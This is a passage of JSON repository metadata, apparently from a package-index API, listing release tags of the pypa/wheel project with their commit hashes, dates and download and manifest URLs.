dencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7